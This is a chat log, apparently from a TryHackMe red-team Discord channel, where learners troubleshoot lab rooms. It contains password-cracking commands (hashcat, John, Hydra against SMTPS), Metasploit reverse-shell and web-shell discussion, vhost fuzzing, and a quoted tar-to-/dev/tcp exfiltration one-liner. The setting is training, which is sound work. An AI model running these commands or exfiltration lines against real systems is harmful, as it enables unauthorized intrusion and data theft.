sudo apt install nvidia-driver-<version> nvidia-cuda-toolkit
For AMD GPUs: Install ROCm or proprietary AMDGPU drivers.
For Intel GPUs/CPUs: Install Intel OpenCL Runtime.
3. Run Hashcat in CPU Mode: If no GPU is available or drivers cannot be updated, use CPU-only mode:
hashcat -D 1 -m 100 -a 0 8d6e34f987851aa599257d3831a1af040886842f /usr/share/wordlists/rockyou.txt
The -D 1 flag forces hashcat to use the CPU.
4. Force Execution: If you're confident in your setup but still see the warning, you can use the --force flag:
hashcat --force -m 100 -a 0 8d6e34f987851aa599257d3831a1af040886842f /usr/share/wordlists/rockyou.txt
5. Verify OpenCL Installation: Test if OpenCL is working on your system using the following command:
clinfo
If no devices are listed, recheck your drivers.
6. Alternative Workaround: If the issue persists, you can:
Use an online cracking tool for learning purposes (ensure it's a safe and legal platform).
Use a preconfigured VM with a compatible environment, such as those provided by TryHackMe
Let me know if this works 
You can also use the John the Ripper tool
echo "8d6e34f987851aa599257d3831a1af040886842f" > hash.txt
2. Identify the Hash Type: You mentioned -m 100 in hashcat, which corresponds to SHA-1. John automatically detects the hash type, but if needed, you can specify the format.
3. Run John with the RockYou Wordlist: Use the following command to crack the hash with the RockYou wordlist:
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
4. View the Cracked Password: Once John finishes, you can view the cracked password with:
john --show hash.txt
@mint palm
Which device are you running this in?
I hate windows rooms I don't know why
its because: Windows 
I restarted the AttackBox and it worked.
I was using the AttackBox from THM on a Windows machine and on MacOS
Hashcat won't work in a VM, it's better to use your host for that
Good to know, thanks for the help ❤️
Gave +1 Rep to @vast quest (current: #1 - 3020)
What am I missing at Password Attacks Online Attacks Task 8?
I created the dict.lst with the password in it. I already checked the answers of the question. But I cant get it by myself.
Thats the command i used and the output I get:
hydra -l pittman@clinic.thmredteam.com -P dict.lst smtp://10.10.74.210:465 -v
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-11-26 18:23:29
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 10500 login tries (l:1/p:10500), ~657 tries per task
[DATA] attacking smtp://10.10.74.210:465/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[WARNING] SMTP does not allow connecting:
[WARNING] SMTP does not allow connecting:
[WARNING] SMTP does not allow connecting:
[WARNING] SMTP does not allow connecting:
[WARNING] SMTP does not allow connecting:
[WARNING] SMTP does not allow connecting:
[WARNING] SMTP does not allow connecting:
[WARNING] SMTP does not allow connecting:
[VERBOSE] Disabled child 11 because of too many errors
[WARNING] SMTP does not allow connecting:
[WARNING] SMTP does not allow connecting:
[WARNING] SMTP does not allow connecting:
[WARNING] SMTP does not allow connecting:
[WARNING] SMTP does not allow connecting:
[WARNING] SMTP does not allow connecting:
[WARNING] SMTP does not allow connecting:
[WARNING] SMTP does not allow connecting:
[VERBOSE] Disabled child 0 because of too many errors
[ERROR] all children were disabled due too many connection errors
0 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-11-26 18:24:01
The issue lies in the incorrect usage of the Hydra command for SMTP with SSL/TLS (port 465). Port 465 uses implicit SSL, which requires additional configuration in Hydra.
Try running the following command:
hydra -l pittman@clinic.thmredteam.com -P dict.lst smtp -S -o output.txt -V -f -e ns -s 465 10.10.74.210
Your protocol isn't right.
Check the question again.
Here is my command.
hydra -l pittman@clinic.thmredteam.com -P dict.lst smtps://10.10.74.210:465 -v
@limber geyser @static root Thanks for the help and sorry for wasting your time, because of a typo...
Gave +1 Rep to @limber geyser (current: #200 - 35)
Hello
Is there a chat for the OpSec Room?
I am unsure how to solve the path without the numbers being displayed
Can you take a screenshot?
Hashcat isn't great in a vm.
Use your host, or use john.
Hello
Can I DM anyone about this pathway
Someone who has finished the evasion portion
I would suggest posting your question here and someone who is knowledgeable would surely chime in.
Hi everyone, has anyone had experience with environments and boxes using Roaming Profiles?
I'm currently going back through some areas of the red teaming path after having 100% it, redoing the AV Evasion: Shellcode room and I'm running into some weirdness with the checker.
I've been using my own code from the NTAPI, successfully receiving shell from the command prompt and successfully passing the AV checker with NtCreateThreadEx in both active and suspended states.
Even though the checker greenlights me I can't get it to dump flag at the same time. Is the THM checker looking for the exact syscalls described in the room? The lesson can't be looking for the exact port number seeing as I've used it twice now in msfvenom (LPORT=7474) without success.
This path is kinda weird. It has rooms that has pre-requisites of rooms and tools you haven't done in the path.
To do this room, please make sure you have done: X/Y/Z/A/B/C/D/E/F/G before as you will need to know about it to know how to perform these tasks

and then those rooms are like later in this path 
To be fair, it is at the bottom of the path
Yeah? Rooms within red teaming path require you to have done rooms that are later in the red teaming path
e.g Lateral Movement room (which is an early room in the red teaming path) wants you to have done breaching AD rooms (which is an late room in the red teaming path)
Task-8 : Windows Local Persistence: Red Team - web shell is not working for me
Persisting Through Existing Services : both the task confusing
https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmdasp.aspx - Do we need to perform any changes in this code ?
Does the Lateral Movement and Pivoting room work for anybody? I am having trouble at Task 1 getting DNS to work its not resolving for some reason...
Do you have the interface?
I have the latermovement interface and it shows that I am connected on THM. I have regenerated the server file a few times. I can ping the DC, but when I attempt to access http://distributor.za.tryhackme.com/creds DNS can't find the address. This does not work on the attack box or my kali VM. I was just curious if its me or someone else is experiencing the same thing.
Hello guys, got a question about weaponization room, I'm able to remotely access the target machine through metasploit but I can't seem to find the flag.txt tried also finding it manually in the win10 machine itself but there's nothing to be found
Can you provide a room link 🙂 ?
Which Task and can you provide a screenshot of the problem 🙂 ?
Sorry I'm off computer right now, will provide later when I get on, basically on the last task since it has the flag for it
Ok , feel free to reach out later we will definitely figure something out 😄
Thank you, very much appreciated 😁
Gave +1 Rep to @lavish axle (current: #3 - 2136)
Hello again! Uploaded the screenshot in here even though solve in using online resources I'm thinking if it's a bug within the room
https://drive.google.com/file/d/1YcKHh61QDFyK13Hm2b2sRB3EUuu6Z96h/view?usp=drivesdk
Uploaded the screenshot
Can you please verify and upload the screenshot here 🙂
Thanks hahahaha I was on the phone discord searched the Google how to's lol thought discord can't really upload images on phone, but nevertheless I'm verified 😁
Gave +1 Rep to @lavish axle (current: #3 - 2146)
Task 6 🙂 ?
Ohhh task 6 wait a minute, gut busted not doing it one by one lol, thought "it's just another way into it" doing it right now
Is everything ok now 🙂 ?
Will update attackbox loading 😁
Ok , I should be here 🙂
Done with act 6 still no traces of flag.txt
I saw on a YouTube video it should exist on the desktop as "flag.txt"
Sometimes you need to wait a few min before the flag pops-up , try again in 5min and give us an update 🙂
I'm also confused with my connection as you can see I can execute the reverse shell but ping and accessing the web application, times out, is it a factor that I'm using a company managed network?
Well , this is a Windows machine probably doesn't respond to pings
Well the important thing is knowing kinds of attack we can do to a target 😁 thanks for the help! Moving on to the next room
Is everything ok now 🙂 ? Were you able to finish the room ?
Did finish the room looked out some tutorials online for the flag itself, tried other attacks myself especially on metasploit reverse shell since I'm most familiar with it.
Congrats , keep up the good work 😄
$ tar zcf - task4/ | base64 | dd conv=ebcdic > /dev/tcp/<IP>/<PORT> nice obfuscation using EBCDIC 🤓
Try to ask in #infosec-general channel , this channel isn't active that much 🙂
https://tryhackme.com/room/obfuscationprinciples i uploaded the powershell snippet in task 4 without any obfuscation and it gave me the flag
Still says I failed
Try typing manually, copy/paste may have an encoding issue
This has still not been fixed
It's from the Data Exfiltration room on this pathway
Try to report it in new #1333993673381253162 channel 🙂
Amen
Hello
Are all of the AD rooms connected
Are they are one single AD infrastructure?
hi can anyone help me every time i use my packed shellcode i get user thm but not av victim but i followed these provided steps
so i cant get the flag
It appears that both the AttackBox and Kali Linux do not have the enumad network adapter for room https://tryhackme.com/room/adenumeration
I have reset the network as well to see if this would resolve it. THMDC = 10.200.18.101 and there appears no route to ping the IP either. I will give the VPN a try next. 🤔
ah! this is not an uncommon issue for this room💡
AttackBox /root/Desktop/NetworkConfigs/adenumeration.ovpn is a 0 byte file size. Downloading the VPN adenumeration network file is also a 0 byte file size.
Network state: Running
Try to leave the room and re-join. Then try to download new vpn file . Start the network beforehand
ah ok, thanks
@lavish axle thanks! The Options > Leave and a re-join solved it. Right away I notice the subnet was different. The enumad network adapter exists on the AttackBox, and I can ping the THMDC now. Thanks so much. 🙂
Gave +1 Rep to @lavish axle (current: #1 - 3876)
Hello everyone, I have a question about TryHackMe paths. Should I complete all the paths leading to the Red Teaming path before attempting challenges, or is it okay to start challenges while I'm still in the Cyber Security 101 path? (I don't have any prior knowledge in cybersecurity.)
I would recommend you to complete Cyber101 first 🙂
Ok, thanks for the help.
Gave +1 Rep to @lavish axle (current: #1 - 3984)
Hey guys, good morning ☕ , I am currently completing task5 of https://tryhackme.com/room/lateralmovementandpivoting . The task says : Both mimikatz and psexec64 are available at C:\tools on THMJMP2. however, i can't find mimikatz underneath that directory :
za\t2_felicia.dean@THMJMP2 C:\Users\t2_felicia.dean>dir c:\tools
Volume in drive C has no label.
Volume Serial Number is F4B0-FCB9
Directory of c:\tools
03/21/2025 02:57 PM <DIR> .
03/21/2025 02:57 PM <DIR> ..
06/14/2022 08:27 PM 45,272 nc64.exe
04/19/2022 09:17 PM 1,078,672 PsExec64.exe
03/16/2022 05:19 PM 906,752 SharpHound.exe
06/19/2022 05:38 AM <DIR> socat
3 File(s) 2,030,696 bytes
3 Dir(s) 9,290,481,664 bytes free
https://tryhackme.com/room/breachingad
why doesn't it resolve?
Hi everyone, I am in the Red Team Recon room and when I run task 6 I get this error message. How can i solve it? Thanks
[recon-ng][thmredteam] > modules load google_site_web
[recon-ng][thmredteam][google_site_web] > run
--------------
THMREDTEAM.COM
--------------
[*] Searching Google for: site:thmredteam.com
[!] Google CAPTCHA triggered. No bypass available.
It's been a while since I did that room but IIRC shouldn't av-victim be the user you're currently running as in the split screen, and not the user you're performing privesc to?
add the dns in network settings like: 10.10.1.125, 1.1.1.1
to get the dns of the dc and for internet
dont forget to restart the service like they say
but i think thats only if you use your own kali
thats what i did and it worked great
PLS UPDATE Room Lateral Movement and Pivoting
It takes so much time to do the Tasks because the infrastructure is not working!!
is there something broken with the CORS & SOP room? i cant complete the regex task and im following it to the T, all i had to change was one thing and the first arbitrary task worked so...? am i doing it wrong?
wrong room my bad
which task ?
can anyone help me out with this problem on tryhackme password attacks room,
What is the crunch command to generate a list containing THM@% and output to a file named tryhackme.txt?
my answer is crunch 5 5 -t THM@%^^ -o tryhackme.txt
and im trying different answers for the -t argument and nothing seems to work
@ and % are special characters and we can use ^ to denote special characters 🙂
❓ I'm at "Insecure Permissions on Service Executable" of task 5 of Windows Privilege Escalation. The step where you copy the payload file over the service executable fails: The process cannot access the file because it is being used by another process. If I stop the service first it works of course. Also the command "icacls WService.exe /grant Everyone:F" fails with "C:\PROGRA~2\SYSTEM~1\WService.exe: Access is denied." Not sure I understand why this command is important as I can control the service the payload works anyway when I start the service. So, because of the 1st error am I correct to assume this exploit will not work if you don't have the privs to control the service?
@lavish axle bro, I want to ask if there is a topic about phishing. I have finished the topic of phishing in thm, but I think it is still too shallow.
I would like to learn something about the teaching of file bundling phishing.
This room maybe
https://tryhackme.com/room/phishinghiddeneye
Er.. What I want is teaching about file bundling phishing🤔 🤔
I would say, yes. Without access to WService.exe, you shouldn't be able to escalate your privileges.
"^" is used to implement special characters like @ and % into the word you specify. also be sure to include quotation marks when putting in a string into the terminal
Did you add that ip and domain in /etc/hosts?
Hey i'm doing the AD rooms, i've never worked on AD so this question might sound stupid but I don't understand what rights are needed for each command. I feel like there is no admin right needed for things like enumeration as it's never really said in the rooms (or at least I didn't find it), but I find it crazy that any user can do Get-ADUser -Identity Administrator -Properties LastLogonDate,PwdLastSet
Good evening, sorry if someone can tell me what are the answers to these questions that are the only ones I have left and there is some problem because if I run Nmap with the script it does not give me the right result. Start the AttackBox if you have not already done so. After making sure you have killed the VM from Task 2, start the target machine for this task. On the AttackBox, run Nmap with the default scripts -sC on MACHINE_IP. You will notice that there is a service listening on port 53. What is its full version value?
According to its description, the ssh2-enum-algos script "reports the number of algorithms (for encryption, compression, etc.) offered by the target SSH2 server". What is the name of the server's host key algorithm that is based on SHA2-512 and is supported by MACHINE_IP?
Of the room: Jr Penetration Tester
Network Security
Nmap Post Port Scans
I solved the problem, it was in the machine where I was running nmap that was not working well.
How to hack website because I find some but I don't understand how to do it
Hi everyone, I am preparing for OSEP that starts pretty soon, do you guys know if there are any rooms/networks/paths in THM (VIP is also fine) that can help me with my OSEP preparations?
If you're replying to the above text, please reference it while responding so that I get a notification or either please drop a text in my DMs, either approach will work just fine for me and will be much appreciated, thanks.
Hello...this is my first time here and I'm aspiring to be a red teamer in the future, can anyone suggest a roadmap to start this journey?
You can follow this one
https://tryhackme.com/hacktivities
Thank u!!
Gave +1 Rep to @lavish axle (current: #1 - 5689)
hey guys
Just finished learning basic x86_64 Intel Assembly (System V ABI).
Now I wanna dive into Reverse Engineering, mainly for CTFs.
What’s the best way to start?
Any good beginner resources / courses?
Need some roadmap or tips please .
Any old heads in here?
yeah... whats up???
Shadow can I dm you?
NOPE
Ok thanks.
quick question what do you do when your browsing certain things for ethical purposes of course and you see this??
LiveOverFlow's YouTube series named Binary Exploitation is an in depth tutorial with examples that teaches you many ways how to approach this topic
@lavish axle How can I learn stealthy Windows system exploitation techniques? Are there any resources?
Check this one out
https://tryhackme.com/room/windowsprivesc20
Can't wait to start this path!
Hi all. Red Team Threat Intel, Task 7. When answering the first question according to the hint, it says "At least one of your answers is incorrect.". In addition, can someone tell me if the mapping from the kill chain to MITRE ATT&CK is correct? Because I believe that exploitation from the Lockheed Martin Cyber Kill Chain must be mapped to persistence in the MITRE ATT&CK framework. Lastly, I think that the MITRE navigator for APT 41 doesn't give the right answers. Any help??
Can you provide a shot of your sorting 🙂
Hey all. I'm on the capstone challenge. I simply cannot capture any flags as I simply continue getting connection refused from the network. Am I missing something?
thank you
Gave +1 Rep to @stoic marten (current: #3086 - 1)
Hi, I’m doing the room ExploitingAD, Task 5.
I generated the Meterpreter payload (windows/x64/meterpreter_reverse_tcp and also tried the staged one), served it via Python HTTP, downloaded with certutil on THMSERVER1, and executed with powershell -ExecutionPolicy Bypass -File.
The payload runs (I see the PID printed), and my handler in Metasploit receives the connection attempt, but the Meterpreter session immediately closes or never fully opens.
I’ve confirmed my LHOST = 10.50.69.127 (VPN IP) and tested with multiple ports (80, 443, 4444, 9001). Same result.
Is there a known issue with the THMSERVER1 VM or firewalling in this task?
Hi all. Red Team Intro to C2, Task 7. I don't understand which IP ADDRESS must enter in "set OverrideLHOST" when i'm trying to configure metasploit "msf6 exploit(multi/handler) >", in order to set up a redirector. I understand what is going on with the LHOST (my public IP ADDRESS) or for the lab will be 127.0.0.1, but will it be the same IP as LHOST??. Any clue??. Thanks.
thanks for your response. I finally figure it out. Thanks though...
Gave +1 Rep to @lavish axle (current: #1 - 5863)
Hi all. I'm currently in the Password Attacks room, Task 3, where it says "Apply what we discuss using cewl against https://clinic.thmredteam.com/ to parse all words and generate a wordlist with a minimum length of 8. Note that we will be using this wordlist later on with another task!", but the cewl command couldn't be found on Linux, nor can I install it. Any help??
How can't you install it ?
why can't i send screenshot if need help
You need to verify first , follow instructions from the link below to learn how to do so 🙂
Hi. First of all, I want to thank you for your support. Now, in my case i tried to install cewl running the command: apt install cewl as root. But everytime i got errors. I'll try to upload a screenshot, if that helps.
Gave +1 Rep to @lavish axle (current: #1 - 5876)
Hi all. Because I'm new here, can someone tell me how to upload a screenshot? Thanks in advance.. I also have verified my account.
You didn't yet , follow instruction from the link below , Discord verification is separate thing from site verification 🙂
I tried to find my token key under my account, but nothing is there. Am I looking for token on a wrong place??
Token on THM profile page not on Discord
Thanks a lot. I'm just tired from work and i kept searching into discord for my token. Much appreciate it.
Gave +1 Rep to @lavish axle (current: #1 - 5877)
So, here is my screenshot where i was trying to install cewl. Worth noting, when i tried to use cupp, i had the same problem but i figured it out by navigating to the cupp directory. That didn't work with cewl.
Try to use your own machine for cewl if possible I think that AttackBox requires an update to download cewl but I am not sure if it has enough space and even if it does it will be reverted to its default configuration at the next startup so it's not worth the effort
Do you mean that i have to setup a VPN connection and enter tryhackme from my machine?. Because i don't know how. However on my kali, cewl command and every command so far is being executed perfectly. To be honest, when i start the AttackBox i get a couple of errors that can be mount hard drives.
Yeah , you can learn how to do so on this link 🙂
https://tryhackme.com/room/openvpn
Thank you very much. I'm already being connected over OPENVPN. I was afraid that I couldn't handle it, but here I am...LOL.
Gave +1 Rep to @lavish axle (current: #1 - 5882)
What kind of a Redteamer wannabe if i can't use VPN...LOL. Seriously now thanks for your advise. Keep up. I know i'm gonna need you soon enough......
Hi again. Room "Password Attacks", Task 8, where the second question tell me to generate a rule-based dictionary from the wordlist clinic.lst in the previous task. email: pittman@clinic.thmredteam.com against 10.10.2.109:465 (SMTPS). So i have done all the requested things, but when I use hydra to attack against the SMTPS i get a message that says "[ERROR] SMTP LOGIN AUTH, either this auth is disabled or server is not using auth: 454 4.7.0 Temporary authentication failure: C[ERROR] SMTP LOGIN AUTH, either this auth is disabled or server is not using auth: 454 4.7.0 Temporary authentication failure: Connection lost to authentication server". Worth noting that i tried the same from my machine and from the attack box using ssh.. Any help??
I also did not find out token on THM profile
Hi. I found the token by clicking at the top right of the page (robot head icon) and from the dropdown menu you have to select manage account. Scroll down and you will see discord token.
Click on your profile image on thm > manage account settings and scroll to the bottom of the page
Hi all. The Lay of the Land room, Task3. Despite the fact that task 3 says for remote connection to windows target machine, in fact there isn't an attack box to use xfreerdp. Trying to connect over openvpn, I got stuck because of the presence of kerberos. Can someone help me how to connect remotely to the windows target machine. I don't know how to configure krb5.conf file in order to bypass kerberos authentication process (I have username and password, IP Address, but not a domain name of the target machine, if there is any. Any hint please??
I see that the last message came from me. So, here is another one.....Hi all. Exploiting Active Directory room task 7. I'm getting an error three days now while using Rubeous. I have followed the instructions to the point "My initial account (creds from task1) is part of the IT group. It has RDP privilege to THMSERVER2 and at the account properties in Active Directory Users and Computers (ADUC), I granted it permissions to sha256 encryption". But when I export a certificate , editing the encryption aes256 and using Rebeus to request a Kerberos ticket-granting ticket (TGT) I'm getting an error "KRB-ERROR (16) : KDC_ERR_PADATA_TYPE_NOSUPP. Any help??. It's the third day I'm trying to pass this task.
Any hint or help on this?
I did the same thing but i guess the wordlist generated is too big and taking too much time
is this free?
Majority is
Hi, I am currently working on ICMP exfiltration in the data exfiltration room. I tried to exfiltrate the data through MSF's icmp_exfil module to my kali VM that is connected to the VPN and it doesn't work, no error, just the warning below. Does anyone have any suggestions?
/usr/share/metasploit-framework/vendor/bundle/ruby/3.3.0/gems/packetfu-2.0.0/lib/packetfu/capture.rb:63: warning: undefining the allocator of T_DATA class PCAPRUB::Pcap
Anyone have an idea on how to change serial for Nvme m.2?
Wdym by that ?
.
Hi. I've been facing the same issue for several days now. I asked echo about this warning and it said that it is not an issue and that metasploit should be able to receive the npings command from icmp-host. Furthermore, I used wireshark and tcpdump and I received the incoming packets. On wireshark I was able to see the data (admin and password). In the task examples we see that one packet was sent and two packets are being received. On our kali we see that one packet is sent and one is received. I think that is the difference between attackbox and tryhackme metasploit and our kali's metasploit. I'm still trying to fix this. If someone can help, KGB maybe??
Yes. I used a custom wordlist instead to save time.
guys, i wanna learn writing python script for automation like submit request and fetch the sessionId and stuff. I want to write this script for solving Hammer room. Do you have any advice or recommend resource?
Can you guys suggest me some famous libs like request or something that i can research more?
Thanks very much for your help!!!
Hi
I am having an issue while executing hashcat on the lab machine Red Teaming>>
Initial Access>>Password Attacks task 5, how to resolve this
can anyone help me on this
I get this when executing hashcat
This OpenCL driver has been marked as likely to fail kernel compilation or to produce false negatives.
You can use --force to override this, but do not report related errors.
I avoid using hashcat on a VM, it works best on a host (like Windows)
Maybe try asking in #subscriber .. reading is essential so it can't be helped. 😅
Can someone tell me if I have the best gmail account please?
Firstname:Hackme Lastname:Please
0daydelivery@gmail.com
I'm in the Intro to C2 room, and am trying to connect to Metasploit through Armitage, but keep running into the "Connection refused" error. Any idea how to fix it, pls?
that shutting down message in your screenshot seems to be the issue: there is no server with port 55533 to connect to any more, hence ./armitage command cannot complete
was that shutting down message generated after issuing Ctrl+C ?
Yep, it was generated after the Ctrl+C
when trying to run msconfig as joe, it gives me uac prompt
so then I runas as mark who is part of the local admin group
I run msconfig via cli as mark and it works
ok so it means my shell is now elevated when I run as mark, right? bc now I can run msconfig
so why does it not let me move to the admin user folder?
I have to use msconfig > tools > select command > cmd.exe > launch
it pops up a new cmd shell
now I can cd to the admin folder
I'm trying to add images to add context but it's not letting me
how to run DeimosC2 linux????
paulchikkkk@75a01e DeimosC2_linux % ls
agents go.mod lib
archives go.sum modules
DeimosC2 gopath requirements.txt
droppers goroot resources
paulchikkkk@75a01e DeimosC2_linux % ./DeimosC2
zsh: exec format error: ./DeimosC2
paulchikkkk@75a01e DeimosC2_linux % sudo DeimosC2
Password:
sudo: DeimosC2: command not found
paulchikkkk@75a01e DeimosC2_linux %
You need to verify your account to post images
@clever flicker
Hay gays
Is the Attackbox not prepared to run 'cewl' commands? I am doing the Password attack room and have lost already 30 minutes trying to install all kind of Ruby gems lol
Evil-winrm takes much time to download files is there another better alternative please?
why you do this to us thm
you mean to tell me the answer is the opposite? I don't get it
@worthy grove Sorry mate, I think the magic bytes are actually 4D 5A (MZ).
Those are the first two bytes at offset 0x00 in every PE file.
Sometimes THM is a bit picky with the format like whether they want spaces, lowercase, or no prefix.
So the value is correct, it just depends on how they want us to type it.
All right, thanks mate. I was losing it lol
Gave +1 Rep to @vocal creek (current: #3258 - 1)
hello guys if any one have try hack me coupon pls dm me
Hey guys
Gud day
Pls am looking for a cyber security mentor,am in need of someone to work with,help while growing myself
My RDP disconnects as soon as I login, if anyone logins will it forcefully disconnect me?
Try with Another VPN,
Today I was solving the red team path and I'm facing the same situation: after booting the VM it will terminate within 5 minutes. Then I changed the VPN from Europe to India Mumbai or the other one... Now it's working perfectly.
Aight I'll give it a shot, hope it works!
that's amazing mate!!
really proud of your progress
keep it up and enjoy your next adventure (:
@river lagoon Thank you!
Gave +1 Rep to @river lagoon (current: #3360 - 1)
Hello everyone! Took the quiz on the site and looks like I got red team.
that's cool! go ahead and start your journey in this field
wish you all the best
Thank you, just starting fresh, logical next step is go through the cyber sec roadmap.
Gave +1 Rep to @river lagoon (current: #2189 - 2)
Trust Will will barely come out alive in this one 😂😂
Xup guys
I just came in contact with a crypto projects hosting a hackathon where prize is $100,000
Isn't this exciting
Details
Anyways are thm servers down?
I’m gettin error
In red team lateral movement room
Sure thing
Here or dm?
Hmmm,have their support acknowledged this?
Can anyone tell me which lab i should consider. I want to get in the red team
As a beginner*
Hello I have a question after completing the intro on tryhackme do I have to pay to progress further I'm a newbie so...
@south terrace yes but its worth every penny
@rocky matrix if you just started as a beginner on the tryhackme you should consider the "pre-security" and "cyber security 101" then you can choose the JR Penetration path to work as JR pentesting and red teaming
remember for red teaming you will have to work hard (Even I'm doing the red teaming and I'm on the cyber security 101).
Ok I'll check it out
Oh cool sounds fun
I don't mind a challenge to be fair
really cheap too
some services extort u but tryhackme has such a fair price icl
Hi
That's good then
Hii
Hi
I'm doing Breaching Active Directory. I'm not able to ping the THMDC. I'm using the attack box
Same here
@wispy root it doesn't work, try to restart the VM or just use google
Anyone encounter trouble accessing the websites that are part of the labs in Advanced SQL Injection?
wouldn’t work yesterday gave it some time, tried today no dice.
Also tried connect vs VPN.. I normally use Attackbox but just trying stuff at this point
I pay for the premium access so it’s annoying to continually run into connectivity issues with THM
Ran most test with added to /etc/hosts and without
Can someone explain why this command is failing on the TakeOver challenge:
ffuf -w wordlist.txt -u https://$rhosts/ -H "Host: FUZZ.futurevera.thm" -fs 4605 -t 100
/'\ /'\ /'\
/\ _/ /\ __/ /\ __/
\ \ ,\ \ ,/\ /\ \ \ \ ,\
\ \ _/ \ \ _/\ \ _\ \ \ \ _/
\ _\ \ _\ \ _/ \ _\
// // // /_/
v2.1.0-dev
__
:: Method : GET
:: URL : https:///
:: Wordlist : FUZZ: /home/kali/wordlist.txt
:: Header : Host: FUZZ.futurevera.thm
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 100
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 4605
__
:: Progress: [37125/37125] :: Job [1/1] :: 38461 req/sec :: Duration: [0:00:01] :: Errors: 37125 ::
Did you add that domain to your /etc/hosts file
as far as I know I did
may I paste the /etc/hosts file here or is that a spoiler ??
here it is:
127.0.0.1 localhost
127.0.1.1 kali
10.82.146.133 futurevera.thm portal.futurevera.thm payroll.futurevera.thm blog.futurevera.thm support.futurevera.thm secrethelpdesk934752.support.futurevera.thm
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
@coral marten You did not set $rhosts as is clear from the URL in the output of ffuf: :: URL : https:///
oke
I m sure I did that
but I will try again
but it will be tomorrow or so
it is not late
I'm new to this path and I want to become strong in it. What do the path experts advise me to do?
Are you running this command where you have your wordlist.txt?
yep
Have you enabled the flag where it will ignore the check for certificate validity or something along those lines?
Enable what flag?
Did your command have the -k flag? As the certificate for the room is self-signed or doesn't have a valid CA, if I remember correctly
no, I did this command:
ffuf -w wordlist.txt -u https://$rhosts/ -H "Host: FUZZ.futurevera.thm" -fs 4605 -t 100
and I see something weird
┌──(kali㉿kali)-[~]
└─$ export RHOSTS=10.81.142.180
┌──(kali㉿kali)-[~]
└─$ echo $RHOST
Why when i do echo the variable is empty
still weird
I try this:
ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://futurevera.thm/ -H "Host: FUZZ.futurevera.thm" -fw 1 -t 100
ffuf -w wordlist.txt -u https://$RHOSTS/ -H "Host: FUZZ.futurevera.thm" -fs 4605 -t 100
the first one works and give me two subdomains
Second one does not work
@spare depot any idea why the first one works and the second not
futurevera.thm is one of the many possible virtual hosts that is running on the host
Should be RHOSTS in the second command
so no $ before it ??
Have you confirmed that both words appear in both lists?
I was referring to your echo command here.
yes
^
i think it has to do something with the RHOST variable
It could be on the web server configuration
I assumed that was the website which has to be cracked
In the case of web servers hosting multiple sites, if you just give it the IP address, the web server wouldn't know which web site you are trying to access / request.
when I replace it with https://futurevera.thm then the script runs but do not give the right answer
Did you put in the -k flag when you run ffuf against https?
maybe I have to do the pentester course before I try this one against
You may or may not do it in that order. While it is recommended, each person may have their own path to follow based on their background and interests.
Then nothing happens when I do:
ffuf -w wordlist.txt -u https://futurevera.thm -H "Host: FUZZ.futurevera.thm" -fs 4605 -t 100 -k
and now the other command is also not working
I try again after lunch
In an HTTPS scenario you should specify the IP address of the target server in the -u option instead of the host/domain name. The reason is that, when using ffuf with HTTPS, the TLS client will use the value in the -u option to fill in the Server Name Indication (SNI) extension in its Client Hello. It does this to allow the server to select the correct vhost certificate. However, this will fail as the server has no vhost for futurevera.thm. So, you should change your ffuf command to
ffuf -w wordlist.txt -u https://a.b.c.d -H "Host: FUZZ.futurevera.thm" -fs 4605 -t 100 -k
with a.b.c.d being the ip address of the server.
This will also work because here you specifically set the SNI to the IP address which causes the SNI to be omitted in the Client Hello
ffuf -w wordlist.txt -u https://futurevera.thm -H "Host: FUZZ.futurevera.thm" -fs 4605 -t 100 -k -sni a.b.c.d
It seems gobuster handles this better as this just works in gobuster:
gobuster vhost -k -u https://futurevera.thm -w ~/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt --domain futurevera.thm --append-domain
Btw, the -k option only disables the client-side cert check. It does not prevent cert selection from failing server-side because of a wrong SNI.
with hackerbox how can I install things like cewl
I know get this message:
Unable to fetch some archives, maybe run apt-get update or try with --fix-missing?
@pallid pine no luck in kali vm
first one gives me:
:: Errors: 8626 ::
Second one works
So, ffuf with -sni option works?
What's the output of this command?
getent hosts futurevera.thm
yep and go buster also
10.81.133.176 futurevera.thm portal.futurevera.thm payroll.futurevera.thm blog.futurevera.thm support.futurevera.thm secrethelpdesk934752.support.futurevera.thm
Indeed, if I add all those subdomains instead of only the main domain it fails for me too.
Gobuster and ffuf seem to handle name resolution differently, but I haven't wrapped my head around the exact difference yet. It seems gobuster does a single name resolution of only the main domain while ffuf seems to try to resolve fuzzed domains.
here if I delete all the subdomains it still fails on the first one
and then the second fails also
go buster still works
so lessons to take , use gobuster
@pallid pine thanks for all the help
Gave +1 Rep to @pallid pine (current: #1352 - 4)
also with my own wordlist gobuster still works and give the expected output
Yes, I like gobuster more. Also the error reporting is better. If the host is down, ffuf will just sit there trying in vain without showing a clear error, while gobuster will clearly report a timeout
Anyway, gtg. Have fun 👋
Hi, I’m trying the Hammer challenge and I have a problem brute forcing the pin for the reset password; fuzz takes too long and it times out. I’m using a file with 9999 numbers, should I use a smaller batch of numbers or are there any ideas to solve the first task?🤔
having an issue with an answer for a question
Task 07: Creating a Threat Intel Driven Campaign
how start bug bounty
guys , im on CTF school championship and i need someone to lead me up to a web exploitation cuz i don't know anything about it and i saw it like its very hard to exploit or injecting it . btw im working in picoCTF , is that website worth it only for my school ?
If this is a school competition, I'm afraid folks won't be able to assist as it might be considered as cheating.
Hi
Hii
Hi there! I am currently learning about AD Penetration testing more specifically about Kerberoastable accounts, SNPs, PowerView and so on. I wanted to ask if there are any good rooms here for CTFs, where I can practice those specific skills? Could anyone recommend any? Thanks in advance!
